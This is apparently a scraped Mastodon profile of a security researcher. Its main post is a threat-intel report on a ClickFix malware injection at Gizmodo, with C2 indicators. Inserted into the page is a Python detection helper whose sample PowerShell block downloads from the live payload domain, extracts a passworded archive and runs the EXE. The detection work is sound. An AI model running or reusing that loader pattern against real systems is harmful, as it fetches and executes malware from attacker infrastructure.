1,057 Followers
408 Following
10 Posts
Teaching faculty. Security researcher. Red team, DevOps, AppSec. An academic but not an academic. nerdprof @ Twitter
Waiting for the first person to sue their employer for cognitive damage due to forced AI use. 🤔
I see folks are choosing violence today.
Does anyone happen to have any good resources for how much malware is hosted behind CloudFlare? I know the answer is a lot, but I've no actual stats.

RE: https://infosec.exchange/@briankrebs/116780029181293028

Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate too. Inject is in the main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resolved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if it passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.

TA also has a Mac payload configured, but it seems broken at the moment and asks for a password of some zip file when executed 🤷

Note: ErrTraffic is a ClickFix-as-a-Service, so other compromised sites can lead to other malware from other affiliates.
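The loader chain described in the post above, turned into a small triage helper. This is an added example, not code from the post's author or from any tooling the post mentions: it refangs the defanged indicators the post lists and scores PowerShell script-block text (for instance the ScriptBlockText of Event ID 4104) for the download-archive / check-for-7-Zip / fetch-7-Zip / extract / run pattern. The stage regexes, the invented paths, filenames, password and the 7-Zip download URL, and both sample script blocks are constructed assumptions; the real loader's command lines are not in the post.

```python
import re

# Indicators quoted in the post, defanged exactly as written there.
DEFANGED_IOCS = {
    "cdnpro-987[.]xyz": "ErrTraffic C2 (resolved via EtherHiding)",
    "cdnportal-us[.]xyz": "PowerShell payload domain",
    "178[.]16[.]55[.]191": "NetSupport RAT C2",
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form that appears in logs."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOCS = {refang(k): v for k, v in DEFANGED_IOCS.items()}

# Stages of the chain the post describes, matched line by line ('.' does not
# cross newlines). The patterns are an assumption of this example: they encode
# the behaviour (fetch a .7z, test for 7-Zip, fetch 7-Zip if absent, extract,
# start the dropped EXE), not the real loader's exact command lines.
STAGES = [
    ("download_archive", re.compile(r"(Invoke-WebRequest|iwr|DownloadFile|curl)\b.*\.7z", re.I)),
    ("check_7zip_installed", re.compile(r"Test-Path\b.*7z", re.I)),
    ("fetch_7zip", re.compile(r"(Invoke-WebRequest|iwr|DownloadFile|curl)\b.*7z.*\.(exe|msi)", re.I)),
    ("extract_archive", re.compile(r"7z(\.exe)?\"?\s+x\b", re.I)),
    ("start_process_exe", re.compile(r"Start-Process\b.*\.exe", re.I)),
]


def analyze_script_block(text: str) -> dict:
    """Return IOC hits, matched stages and a verdict for one script block."""
    ioc_hits = {ioc: desc for ioc, desc in IOCS.items() if ioc in text}
    stage_hits = [name for name, rx in STAGES if rx.search(text)]
    # A known C2/payload host is enough on its own. Otherwise require most of
    # the behavioural chain so an admin's lone "7z x backup.7z" does not alert.
    suspicious = bool(ioc_hits) or len(stage_hits) >= 4
    return {"iocs": ioc_hits, "stages": stage_hits, "suspicious": suspicious}


# Constructed sample: a benign restore script that also uses 7-Zip.
BENIGN_BLOCK = r"""
if (Test-Path "C:\Program Files\7-Zip\7z.exe") {
  & "C:\Program Files\7-Zip\7z.exe" x C:\backups\db-2024.7z -oC:\restore
}
"""

# Constructed sample mimicking the chain in the post. Only the payload domain
# comes from the post; the URI path, filenames, password and the 7-Zip
# download URL (example.invalid) are invented for this example.
LOADER_BLOCK = r"""
Invoke-WebRequest "https://cdnportal-us.xyz/abc123/def456" -OutFile "$env:TEMP\u.7z"
if (-not (Test-Path "C:\Program Files\7-Zip\7z.exe")) {
  Invoke-WebRequest "https://example.invalid/7z-setup.exe" -OutFile "$env:TEMP\7zs.exe"
  Start-Process "$env:TEMP\7zs.exe" -ArgumentList "/S" -Wait
}
& "C:\Program Files\7-Zip\7z.exe" x "$env:TEMP\u.7z" -pSECRET -o"$env:TEMP\u"
Start-Process "$env:TEMP\u\update.exe"
"""

if __name__ == "__main__":
    for label, block in (("benign", BENIGN_BLOCK), ("loader", LOADER_BLOCK)):
        print(label, analyze_script_block(block))
```

Feed it the ScriptBlockText field of 4104 events (or any decoded PowerShell) and alert on `suspicious`; the IOC dictionary also works as-is against proxy or DNS logs for the NetSupport C2 IP, since `analyze_script_block` only does substring matching for indicators.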

um, what’s that part where samsung *agrees* they’ve known about the key leak since, uh, 2016?? https://arstechnica.com/gadgets/2022/12/samsungs-android-app-signing-key-has-leaked-is-being-used-to-sign-malware/
Samsung’s Android app-signing key has leaked, is being used to sign malware

The cryptographic key proves an update is legit, assuming your OEM doesn't lose it.

Ars Technica